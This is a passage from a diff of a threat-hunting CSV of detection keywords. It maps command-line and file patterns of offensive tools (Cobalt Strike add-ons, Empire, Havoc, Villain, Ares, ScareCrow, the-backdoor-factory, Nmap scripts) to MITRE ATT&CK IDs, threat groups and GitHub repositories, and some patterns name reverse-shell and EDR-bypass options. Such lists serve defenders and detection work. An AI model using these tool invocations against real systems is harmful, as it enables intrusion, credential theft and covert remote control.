protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -hashes lm:nt -gpo-id * -powershell *","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" "* --hash-type * --attack-mode *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"* hashview-agent *","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"* havoc-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - 
T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"* hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"* hashview-agent *","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"* havoc-client*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "* hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* HiddenDesktop.cna*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","925","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" +"* HiddenDesktop.cna*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z" "* hnap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* --hoax-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* --hoax-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "* hollow.x64.*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "* --host * --port * --executable *.exe --command *cmd.exe*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* hostenum.py *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"* --host-file *.txt -u * --prompt --admin --no-banner*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"* --host-file *.txt -u * --prompt --admin --no-banner*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. 
This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "* hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-crtsh.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-robtex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -Hosts * -TopPorts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* hping3 *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"* http://localhost:8080 -o agent*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"* -Hosts * -TopPorts *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* hping3 *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"* http://localhost:8080 -o agent*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - 
TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "* http_malleable*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "* http-adobe-coldfusion-apsa1301.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-affiliate-id.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -871,7 +871,7 @@ "* http-robots.txt.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-reverse-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-robtex-shared-ns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* http-sap-netweaver-leak.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-security-headers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-server-header.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -921,7 +921,7 @@ "* http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3002","526","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" +"* http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" "* http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -931,8 +931,8 @@ "* http-wordpress-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -I *.bin * -Loader dll*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -I *.bin * -Loader dll*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* -i havex.profile *","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 